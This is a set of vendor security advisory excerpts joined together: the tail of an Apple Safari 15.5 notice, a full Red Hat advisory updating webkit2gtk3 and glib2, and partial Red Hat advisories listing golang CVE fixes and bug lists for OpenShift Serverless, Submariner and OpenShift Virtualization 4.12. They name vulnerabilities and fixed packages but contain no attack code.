CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab WebKit Bugzilla: 238699 CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech Additional recognition WebKit We would like to acknowledge James Lee, an anonymous researcher for their assistance. Safari 15.5 may be obtained from the Mac App Store. All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Moderate: webkit2gtk3 security and bug fix update Advisory ID: RHSA-2022:7704-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2022:7704 Issue date: 2022-11-08 CVE Names: CVE-2022-22624 CVE-2022-22628 CVE-2022-22629 CVE-2022-22662 CVE-2022-26700 CVE-2022-26709 CVE-2022-26710 CVE-2022-26716 CVE-2022-26717 CVE-2022-26719 CVE-2022-30293 ==================================================================== 1. Summary: An update for glib2 and webkit2gtk3 is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat CodeReady Linux Builder (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64 Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64 3. Description: WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. GLib provides the core application building blocks for libraries and applications written in C. It provides the core object system used in GNOME, the main loop implementation, and a large set of utility functions for strings and common data structures. Security Fix(es): * webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22624) * webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22628) * webkitgtk: Buffer overflow leading to arbitrary code execution (CVE-2022-22629) * webkitgtk: Cookie management issue leading to sensitive user information disclosure (CVE-2022-22662) * webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26700) * webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26709) * webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26710) * webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26716) * webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26717) * webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26719) * webkitgtk: Heap buffer overflow in WebCore::TextureMapperLayer::setContentsLayer leading to arbitrary code execution (CVE-2022-30293) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.7 Release Notes linked from the References section. 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 2061994 - Upgrade WebKitGTK for RHEL 8.7 2073893 - CVE-2022-22624 webkitgtk: Use-after-free leading to arbitrary code execution 2073896 - CVE-2022-22628 webkitgtk: Use-after-free leading to arbitrary code execution 2073899 - CVE-2022-22629 webkitgtk: Buffer overflow leading to arbitrary code execution 2082548 - CVE-2022-30293 webkitgtk: Heap buffer overflow in WebCore::TextureMapperLayer::setContentsLayer leading to arbitrary code execution 2092732 - CVE-2022-26700 webkitgtk: Memory corruption issue leading to arbitrary code execution 2092733 - CVE-2022-26709 webkitgtk: Use-after-free leading to arbitrary code execution 2092734 - CVE-2022-26716 webkitgtk: Memory corruption issue leading to arbitrary code execution 2092735 - CVE-2022-26717 webkitgtk: Use-after-free leading to arbitrary code execution 2092736 - CVE-2022-26719 webkitgtk: Memory corruption issue leading to arbitrary code execution 2099334 - Can not play yelp videos 2104787 - CVE-2022-22662 webkitgtk: Cookie management issue leading to sensitive user information disclosure 2104789 - CVE-2022-26710 webkitgtk: Use-after-free leading to arbitrary code execution 6. Package List: Red Hat Enterprise Linux AppStream (v. 8): Source: webkit2gtk3-2.36.7-1.el8.src.rpm aarch64: webkit2gtk3-2.36.7-1.el8.aarch64.rpm webkit2gtk3-debuginfo-2.36.7-1.el8.aarch64.rpm webkit2gtk3-debugsource-2.36.7-1.el8.aarch64.rpm webkit2gtk3-devel-2.36.7-1.el8.aarch64.rpm webkit2gtk3-devel-debuginfo-2.36.7-1.el8.aarch64.rpm webkit2gtk3-jsc-2.36.7-1.el8.aarch64.rpm webkit2gtk3-jsc-debuginfo-2.36.7-1.el8.aarch64.rpm webkit2gtk3-jsc-devel-2.36.7-1.el8.aarch64.rpm webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8.aarch64.rpm ppc64le: webkit2gtk3-2.36.7-1.el8.ppc64le.rpm webkit2gtk3-debuginfo-2.36.7-1.el8.ppc64le.rpm webkit2gtk3-debugsource-2.36.7-1.el8.ppc64le.rpm webkit2gtk3-devel-2.36.7-1.el8.ppc64le.rpm webkit2gtk3-devel-debuginfo-2.36.7-1.el8.ppc64le.rpm webkit2gtk3-jsc-2.36.7-1.el8.ppc64le.rpm webkit2gtk3-jsc-debuginfo-2.36.7-1.el8.ppc64le.rpm webkit2gtk3-jsc-devel-2.36.7-1.el8.ppc64le.rpm webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8.ppc64le.rpm s390x: webkit2gtk3-2.36.7-1.el8.s390x.rpm webkit2gtk3-debuginfo-2.36.7-1.el8.s390x.rpm webkit2gtk3-debugsource-2.36.7-1.el8.s390x.rpm webkit2gtk3-devel-2.36.7-1.el8.s390x.rpm webkit2gtk3-devel-debuginfo-2.36.7-1.el8.s390x.rpm webkit2gtk3-jsc-2.36.7-1.el8.s390x.rpm webkit2gtk3-jsc-debuginfo-2.36.7-1.el8.s390x.rpm webkit2gtk3-jsc-devel-2.36.7-1.el8.s390x.rpm webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8.s390x.rpm x86_64: webkit2gtk3-2.36.7-1.el8.i686.rpm webkit2gtk3-2.36.7-1.el8.x86_64.rpm webkit2gtk3-debuginfo-2.36.7-1.el8.i686.rpm webkit2gtk3-debuginfo-2.36.7-1.el8.x86_64.rpm webkit2gtk3-debugsource-2.36.7-1.el8.i686.rpm webkit2gtk3-debugsource-2.36.7-1.el8.x86_64.rpm webkit2gtk3-devel-2.36.7-1.el8.i686.rpm webkit2gtk3-devel-2.36.7-1.el8.x86_64.rpm webkit2gtk3-devel-debuginfo-2.36.7-1.el8.i686.rpm webkit2gtk3-devel-debuginfo-2.36.7-1.el8.x86_64.rpm webkit2gtk3-jsc-2.36.7-1.el8.i686.rpm webkit2gtk3-jsc-2.36.7-1.el8.x86_64.rpm webkit2gtk3-jsc-debuginfo-2.36.7-1.el8.i686.rpm webkit2gtk3-jsc-debuginfo-2.36.7-1.el8.x86_64.rpm webkit2gtk3-jsc-devel-2.36.7-1.el8.i686.rpm webkit2gtk3-jsc-devel-2.36.7-1.el8.x86_64.rpm webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8.i686.rpm webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8.x86_64.rpm Red Hat Enterprise Linux BaseOS (v. 8): Source: glib2-2.56.4-159.el8.src.rpm aarch64: glib2-2.56.4-159.el8.aarch64.rpm glib2-debuginfo-2.56.4-159.el8.aarch64.rpm glib2-debugsource-2.56.4-159.el8.aarch64.rpm glib2-devel-2.56.4-159.el8.aarch64.rpm glib2-devel-debuginfo-2.56.4-159.el8.aarch64.rpm glib2-fam-2.56.4-159.el8.aarch64.rpm glib2-fam-debuginfo-2.56.4-159.el8.aarch64.rpm glib2-tests-2.56.4-159.el8.aarch64.rpm glib2-tests-debuginfo-2.56.4-159.el8.aarch64.rpm ppc64le: glib2-2.56.4-159.el8.ppc64le.rpm glib2-debuginfo-2.56.4-159.el8.ppc64le.rpm glib2-debugsource-2.56.4-159.el8.ppc64le.rpm glib2-devel-2.56.4-159.el8.ppc64le.rpm glib2-devel-debuginfo-2.56.4-159.el8.ppc64le.rpm glib2-fam-2.56.4-159.el8.ppc64le.rpm glib2-fam-debuginfo-2.56.4-159.el8.ppc64le.rpm glib2-tests-2.56.4-159.el8.ppc64le.rpm glib2-tests-debuginfo-2.56.4-159.el8.ppc64le.rpm s390x: glib2-2.56.4-159.el8.s390x.rpm glib2-debuginfo-2.56.4-159.el8.s390x.rpm glib2-debugsource-2.56.4-159.el8.s390x.rpm glib2-devel-2.56.4-159.el8.s390x.rpm glib2-devel-debuginfo-2.56.4-159.el8.s390x.rpm glib2-fam-2.56.4-159.el8.s390x.rpm glib2-fam-debuginfo-2.56.4-159.el8.s390x.rpm glib2-tests-2.56.4-159.el8.s390x.rpm glib2-tests-debuginfo-2.56.4-159.el8.s390x.rpm x86_64: glib2-2.56.4-159.el8.i686.rpm glib2-2.56.4-159.el8.x86_64.rpm glib2-debuginfo-2.56.4-159.el8.i686.rpm glib2-debuginfo-2.56.4-159.el8.x86_64.rpm glib2-debugsource-2.56.4-159.el8.i686.rpm glib2-debugsource-2.56.4-159.el8.x86_64.rpm glib2-devel-2.56.4-159.el8.i686.rpm glib2-devel-2.56.4-159.el8.x86_64.rpm glib2-devel-debuginfo-2.56.4-159.el8.i686.rpm glib2-devel-debuginfo-2.56.4-159.el8.x86_64.rpm glib2-fam-2.56.4-159.el8.x86_64.rpm glib2-fam-debuginfo-2.56.4-159.el8.i686.rpm glib2-fam-debuginfo-2.56.4-159.el8.x86_64.rpm glib2-tests-2.56.4-159.el8.x86_64.rpm glib2-tests-debuginfo-2.56.4-159.el8.i686.rpm glib2-tests-debuginfo-2.56.4-159.el8.x86_64.rpm Red Hat CodeReady Linux Builder (v. 8): aarch64: glib2-debuginfo-2.56.4-159.el8.aarch64.rpm glib2-debugsource-2.56.4-159.el8.aarch64.rpm glib2-devel-debuginfo-2.56.4-159.el8.aarch64.rpm glib2-fam-debuginfo-2.56.4-159.el8.aarch64.rpm glib2-static-2.56.4-159.el8.aarch64.rpm glib2-tests-debuginfo-2.56.4-159.el8.aarch64.rpm noarch: glib2-doc-2.56.4-159.el8.noarch.rpm ppc64le: glib2-debuginfo-2.56.4-159.el8.ppc64le.rpm glib2-debugsource-2.56.4-159.el8.ppc64le.rpm glib2-devel-debuginfo-2.56.4-159.el8.ppc64le.rpm glib2-fam-debuginfo-2.56.4-159.el8.ppc64le.rpm glib2-static-2.56.4-159.el8.ppc64le.rpm glib2-tests-debuginfo-2.56.4-159.el8.ppc64le.rpm s390x: glib2-debuginfo-2.56.4-159.el8.s390x.rpm glib2-debugsource-2.56.4-159.el8.s390x.rpm glib2-devel-debuginfo-2.56.4-159.el8.s390x.rpm glib2-fam-debuginfo-2.56.4-159.el8.s390x.rpm glib2-static-2.56.4-159.el8.s390x.rpm glib2-tests-debuginfo-2.56.4-159.el8.s390x.rpm x86_64: glib2-debuginfo-2.56.4-159.el8.i686.rpm glib2-debuginfo-2.56.4-159.el8.x86_64.rpm glib2-debugsource-2.56.4-159.el8.i686.rpm glib2-debugsource-2.56.4-159.el8.x86_64.rpm glib2-devel-debuginfo-2.56.4-159.el8.i686.rpm glib2-devel-debuginfo-2.56.4-159.el8.x86_64.rpm glib2-fam-debuginfo-2.56.4-159.el8.i686.rpm glib2-fam-debuginfo-2.56.4-159.el8.x86_64.rpm glib2-static-2.56.4-159.el8.i686.rpm glib2-static-2.56.4-159.el8.x86_64.rpm glib2-tests-debuginfo-2.56.4-159.el8.i686.rpm glib2-tests-debuginfo-2.56.4-159.el8.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2022-22624 https://access.redhat.com/security/cve/CVE-2022-22628 https://access.redhat.com/security/cve/CVE-2022-22629 https://access.redhat.com/security/cve/CVE-2022-22662 https://access.redhat.com/security/cve/CVE-2022-26700 https://access.redhat.com/security/cve/CVE-2022-26709 https://access.redhat.com/security/cve/CVE-2022-26710 https://access.redhat.com/security/cve/CVE-2022-26716 https://access.redhat.com/security/cve/CVE-2022-26717 https://access.redhat.com/security/cve/CVE-2022-26719 https://access.redhat.com/security/cve/CVE-2022-30293 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.7_release_notes/index 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBY2pSR9zjgjWX9erEAQiQFQ//YREiZYxfs4xndA0wPNv+fq6qubz4ht3h FycNYUUhtiB+KqnpXfelECae9VC+jtDaBqrmopN4kGYPERbIBNOaxDM/AjiwQoRy WAMPMG0Nf7bES6RH793l9a36dPezHS7FQymSw1UsWgiFLEzalcP41UhJmz2ehhnF 89oC3QQ831rCFn637hiTMFkaOMhQsR+P7iCnpDXEA9f3jadtWkMk+ALkddEGR+zr bbCVMi3vd4q1w854SOU0mZjdBXd3JKcBFq5Iux1gY6XVDCilgU6QgZaltJJQx2u6 J3qGFykmSwgoCfvz2QUBMH5x3gYJHknfa1CrqgOtOC5gpO9ChEyRg7T5aC/mpY4P kfFh0VJEOZS29b34KOlKvXCRbgDjvuBy8EHvqJCs29a9ISOWOpZ8qsLDjTMBk+MR AU+J3Ym3ZiRaQhpFDDSakcuub0DAHESbokIsTHlsOt8J80GspJod3GRl2BUfY4FH uVH6t7IIL0k6zL/1si7cEnT1uMxp7rPh70KPSG0hm2CHrJ6MOLt9D6/eAuj7xAEL vkxev1kJ28kXoovVYmylhcjxX4w6v1M9QGE7IBMFEnFDi6btyWNDjD1vLGvmbuIT iJ120wnUt3kGH0vMLO2+Rfwj7jYVyR08tTY8JDtrxbhrUThjhJ9GCTLg3s+MaYVk J8NwK2xt2AQ=vhlq -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . * golang: regexp/syntax: limit memory used by parsing regexps (CVE-2022-41715) * golang: net/http: handle server errors after sending GOAWAY (CVE-2022-27664) * golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters (CVE-2022-2880) * golang: archive/tar: unbounded memory consumption when reading headers (CVE-2022-2879) For more details about the security issues, including the impact; a CVSS score; acknowledgments; and other related information refer to the CVE pages linked in the References section. Bugs fixed (https://bugzilla.redhat.com/): 2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY 2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers 2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters 2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps 2154755 - Release of OpenShift Serverless Eventing 1.27.0 2154757 - Release of OpenShift Serverless Serving 1.27.0 5. Description: Submariner enables direct networking between pods and services on different Kubernetes clusters that are either on-premises or in the cloud. For more information about Submariner, see the Submariner open source community website at: https://submariner.io/. This advisory contains bug fixes and enhancements to the Submariner container images. Security fixes: * CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY * CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps * CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests Bugs addressed: * subctl diagnose firewall metrics does not work on merged kubeconfig (BZ# 2013711) * [Submariner] - Fails to increase gateway amount after deployment (BZ# 2097381) * Submariner gateway node does not get deleted with subctl cloud cleanup command (BZ# 2108634) * submariner GW pods are unable to resolve the DNS of the Broker K8s API URL (BZ# 2119362) * Submariner gateway node does not get deployed after applying ManagedClusterAddOn on Openstack (BZ# 2124219) * unable to run subctl benchmark latency, pods fail with ImagePullBackOff (BZ# 2130326) * [IBM Z] - Submariner addon unistallation doesnt work from ACM console (BZ# 2136442) * Tags on AWS security group for gateway node break cloud-controller LoadBalancer (BZ# 2139477) * RHACM - Submariner: UI support for OpenStack #19297 (ACM-1242) * Submariner OVN support (ACM-1358) * Submariner Azure Console support (ACM-1388) * ManagedClusterSet consumers migrate to v1beta2 (ACM-1614) * Submariner on disconnected ACM #22000 (ACM-1678) * Submariner gateway: Error creating AWS security group if already exists (ACM-2055) * Submariner gateway security group in AWS not deleted when uninstalling submariner (ACM-2057) * The submariner-metrics-proxy pod pulls an image with wrong naming convention (ACM-2058) * The submariner-metrics-proxy pod is not part of the Agent readiness check (ACM-2067) * Subctl 0.14.0 prints version "vsubctl" (ACM-2132) * managedclusters "local-cluster" not found and missing Submariner Broker CRD (ACM-2145) * Add support of ARO to Submariner deployment (ACM-2150) * The e2e tests execution fails for "Basic TCP connectivity" tests (ACM-2204) * Gateway error shown "diagnose all" tests (ACM-2206) * Submariner does not support cluster "kube-proxy ipvs mode"(ACM-2211) * Vsphere cluster shows Pod Security admission controller warnings (ACM-2256) * Cannot use submariner with OSP and self signed certs (ACM-2274) * Subctl diagnose tests spawn nettest image with wrong tag nameing convention (ACM-2387) * Subctl 0.14.1 prints version "devel" (ACM-2482) 3. Bugs fixed (https://bugzilla.redhat.com/): 2013711 - subctl diagnose firewall metrics does not work on merged kubeconfig 2097381 - [Submariner] - Fails to increase gateway amount after deployment 2108634 - Submariner gateway node does not get deleted with subctl cloud cleanup command 2119362 - submariner GW pods are unable to resolve the DNS of the Broker K8s API URL 2124219 - Submariner gateway node does not get deployed after applying ManagedClusterAddOn on Openstack 2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY 2130326 - unable to run subctl benchmark latency, pods fail with ImagePullBackOff 2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters 2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps 2136442 - [IBM Z] - Submariner addon unistallation doesnt work from ACM console 2139477 - Tags on AWS security group for gateway node break cloud-controller LoadBalancer 2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests 5. JIRA issues fixed (https://issues.jboss.org/): ACM-1614 - ManagedClusterSet consumers migrate to v1beta2 (Submariner) ACM-2055 - Submariner gateway: Error creating AWS security group if already exists ACM-2057 - [Submariner] - submariner gateway security group in aws not deleted when uninstalling submariner ACM-2058 - [Submariner] - The submariner-metrics-proxy pod pulls an image with wrong naming convention ACM-2067 - [Submariner] - The submariner-metrics-proxy pod is not part of the Agent readiness check ACM-2132 - Subctl 0.14.0 prints version "vsubctl" ACM-2145 - managedclusters "local-cluster" not found and missing Submariner Broker CRD ACM-2150 - Add support of ARO to Submariner deployment ACM-2204 - [Submariner] - e2e tests execution fails for "Basic TCP connectivity" tests ACM-2206 - [Submariner] - Gateway error shown "diagnose all" tests ACM-2211 - [Submariner] - Submariner does not support cluster "kube-proxy ipvs mode" ACM-2256 - [Submariner] - Vsphere cluster shows Pod Security admission controller warnings ACM-2274 - Cannot use submariner with OSP and self signed certs ACM-2387 - [Submariner] - subctl diagnose tests spawn nettest image with wrong tag nameing convention ACM-2482 - Subctl 0.14.1 prints version "devel" 6. Description: OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains the following OpenShift Virtualization 4.12.0 images: Security Fix(es): * golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716) * kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798) * golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561) * golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717) * golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705) * golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962) * golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772) * golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773) * golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806) * golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131) * golang: syscall: faccessat checks wrong group (CVE-2022-29526) * golang: io/fs: stack exhaustion in Glob (CVE-2022-30630) * golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631) * golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632) * golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633) * golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635) * golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148) * golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. RHEL-8-CNV-4.12 ============= bridge-marker-container-v4.12.0-24 cluster-network-addons-operator-container-v4.12.0-24 cnv-containernetworking-plugins-container-v4.12.0-24 cnv-must-gather-container-v4.12.0-58 hco-bundle-registry-container-v4.12.0-769 hostpath-csi-driver-container-v4.12.0-30 hostpath-provisioner-container-v4.12.0-30 hostpath-provisioner-operator-container-v4.12.0-31 hyperconverged-cluster-operator-container-v4.12.0-96 hyperconverged-cluster-webhook-container-v4.12.0-96 kubemacpool-container-v4.12.0-24 kubevirt-console-plugin-container-v4.12.0-182 kubevirt-ssp-operator-container-v4.12.0-64 kubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55 kubevirt-tekton-tasks-copy-template-container-v4.12.0-55 kubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55 kubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55 kubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55 kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55 kubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55 kubevirt-tekton-tasks-operator-container-v4.12.0-40 kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55 kubevirt-template-validator-container-v4.12.0-32 libguestfs-tools-container-v4.12.0-255 ovs-cni-marker-container-v4.12.0-24 ovs-cni-plugin-container-v4.12.0-24 virt-api-container-v4.12.0-255 virt-artifacts-server-container-v4.12.0-255 virt-cdi-apiserver-container-v4.12.0-72 virt-cdi-cloner-container-v4.12.0-72 virt-cdi-controller-container-v4.12.0-72 virt-cdi-importer-container-v4.12.0-72 virt-cdi-operator-container-v4.12.0-72 virt-cdi-uploadproxy-container-v4.12.0-71 virt-cdi-uploadserver-container-v4.12.0-72 virt-controller-container-v4.12.0-255 virt-exportproxy-container-v4.12.0-255 virt-exportserver-container-v4.12.0-255 virt-handler-container-v4.12.0-255 virt-launcher-container-v4.12.0-255 virt-operator-container-v4.12.0-255 virtio-win-container-v4.12.0-10 vm-network-latency-checkup-container-v4.12.0-89 3. Bugs fixed (https://bugzilla.redhat.com/): 1719190 - Unable to cancel live-migration if virt-launcher pod in pending state 2023393 - [CNV] [UI]Additional information needed for cloning when default storageclass in not defined in target datavolume 2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache 2030806 - CVE-2021-44717 golang: syscall: don't close fd 0 on ForkExec error 2040377 - Unable to delete failed VMIM after VM deleted 2046298 - mdevs not configured with drivers installed, if mdev config added to HCO CR before drivers are installed 2052556 - Metric "kubevirt_num_virt_handlers_by_node_running_virt_launcher" reporting incorrect value 2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements 2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString 2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control 2060499 - [RFE] Cannot add additional service (or other objects) to VM template 2069098 - Large scale |VMs migration is slow due to low migration parallelism 2070366 - VM Snapshot Restore hangs indefinitely when backed by a snapshotclass 2071491 - Storage Throughput metrics are incorrect in Overview 2072797 - Metrics in Virtualization -> Overview period is not clear or configurable 2072821 - Top Consumers of Storage Traffic in Kubevirt Dashboard giving unexpected numbers 2079916 - KubeVirt CR seems to be in DeploymentInProgress state and not recovering 2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group 2086285 - [dark mode] VirtualMachine - in the Utilization card the percentages and the graphs not visible enough in dark mode 2086551 - Min CPU feature found in labels 2087724 - Default template show no boot source even there are auto-upload boot sources 2088129 - [SSP] webhook does not comply with restricted security context 2088464 - [CDI] cdi-deployment does not comply with restricted security context 2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR 2089744 - HCO should label its control plane namespace to admit pods at privileged security level 2089751 - 4.12.0 containers 2089804 - 4.12.0 rpms 2091856 - ?Edit BootSource? action should have more explicit information when disabled 2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add 2092796 - [RFE] CPU|Memory display in the template card is not consistent with the display in the template drawer 2093771 - The disk source should be PVC if the template has no auto-update boot source 2093996 - kubectl get vmi API should always return primary interface if exist 2094202 - Cloud-init username field should have hint 2096285 - KubeVirt CR API documentation is missing docs for many fields 2096780 - [RFE] Add ssh-key and sysprep to template scripts tab 2097436 - Online disk expansion ignores filesystem overhead change 2097586 - AccessMode should stay on ReadWriteOnce while editing a disk with storage class HPP 2099556 - [RFE] Add option to enable RDP service for windows vm 2099573 - [RFE] Improve template's message about not editable 2099923 - [RFE] Merge "SSH access" and "SSH command" into one 2100290 - Error is not dismissed on catalog review page 2100436 - VM list filtering ignores VMs in error-states 2100442 - [RFE] allow enabling and disabling SSH service while VM is shut down 2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS 2100629 - Update nested support KBASE article 2100679 - The number of hardware devices is not correct in vm overview tab 2100682 - All hardware devices get deleted while just delete one 2100684 - Workload profile are not editable during creation and after creation 2101144 - VM filter has two "Other" checkboxes which are triggered together 2101164 - [dark mode] Number of alerts in Alerts card not visible enough in dark mode 2101167 - Edit buttons clickable area is too large. 2101333 - [e2e] elements on Template Scheduling tab are missing proper data-test-id 2101335 - Clone action enabled in VM list kebab button for a VM in CrashLoopBackOff state 2101390 - Easy to miss the "tick" when adding GPU device to vm via UI 2101394 - [e2e] elements on VM Scripts tab are missing proper data-test-id 2101423 - wrong user name on using ignition 2101430 - Using CLOUD_USER_PASSWORD in Templates parameters breaks VM review page 2101445 - "Pending changes - Boot Order" 2101454 - Cannot add PVC boot source to template in 'Edit Boot Source Reference' view as a non-priv user 2101499 - Cannot add NIC to VM template as non-priv user 2101501 - NAME parameter in VM template has no effect. 2101628 - non-priv user cannot load dataSource while edit template's rootdisk 2101667 - VMI view is not aligned with vm and tempates 2101681 - All templates are labeling "source available" in template list page 2102074 - VM Creation time on VM Overview Details card lacks string 2102125 - vm clone modal is displaying DV size instead of PVC size 2102132 - align the utilization card of single VM overview with the design 2102138 - Should the word "new" be removed from "Create new VirtualMachine from catalog"? 2102256 - Add button moved to right 2102448 - VM disk is deleted by uncheck "Delete disks (1x)" on delete modal 2102475 - Template 'vm-template-example' should be filtered by 'Fedora' rather than 'Other' 2102561 - sysprep-info should link to downstream doc 2102737 - Clone a VM should lead to vm overview tab 2102740 - "Save" button on vm clone modal should be "Clone" 2103806 - "404: Not Found" appears shortly by clicking the PVC link on vm disk tab 2103807 - PVC is not named by VM name while creating vm quickly 2103817 - Workload profile values in vm details should align with template's value 2103844 - VM nic model is empty 2104331 - VM list page scroll up automatically 2104402 - VM create button is not enabled while adding multiple environment disks 2104422 - Storage status report "OpenShift Data Foundation is not available" even the operator is installed 2104424 - Enable descheduler or hide it on template's scheduling tab 2104479 - [4.12] Cloned VM's snapshot restore fails if the source VM disk is deleted 2104480 - Alerts in VM overview tab disappeared after a few seconds 2104785 - "Add disk" and "Disks" are on the same line 2104859 - [RFE] Add "Copy SSH command" to VM action list 2105257 - Can't set log verbosity level for virt-operator pod 2106175 - All pages are crashed after visit Virtualization -> Overview 2106963 - Cannot add configmap for windows VM 2107279 - VM Template's bootable disk can be marked as bootable 2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read 2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob 2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header 2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions 2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working 2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob 2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode 2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip 2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal 2108339 - datasource does not provide timestamp when updated 2108638 - When chosing a vm or template while in all-namespace, and returning to list, namespace is changed 2109818 - Upstream metrics documentation is not detailed enough 2109975 - DataVolume fails to import "cirros-container-disk-demo" image 2110256 - Storage -> PVC -> upload data, does not support source reference 2110562 - CNV introduces a compliance check fail in "ocp4-moderate" profile - routes-protected-by-tls 2111240 - GiB changes to B in Template's Edit boot source reference modal 2111292 - kubevirt plugin console is crashed after creating a vm with 2 nics 2111328 - kubevirt plugin console crashed after visit vmi page 2111378 - VM SSH command generated by UI points at api VIP 2111744 - Cloned template should not label `app.kubernetes.io/name: common-templates` 2111794 - the virtlogd process is taking too much RAM! (17468Ki > 17Mi) 2112900 - button style are different 2114516 - Nothing happens after clicking on Fedora cloud image list link 2114636 - The style of displayed items are not unified on VM tabs 2114683 - VM overview tab is crashed just after the vm is created 2115257 - Need to Change system-product-name to "OpenShift Virtualization" in CNV-4.12 2115258 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass 2115280 - [e2e] kubevirt-e2e-aws see two duplicated navigation items 2115769 - Machine type is updated to rhel8.6.0 in KV CR but not in Templates 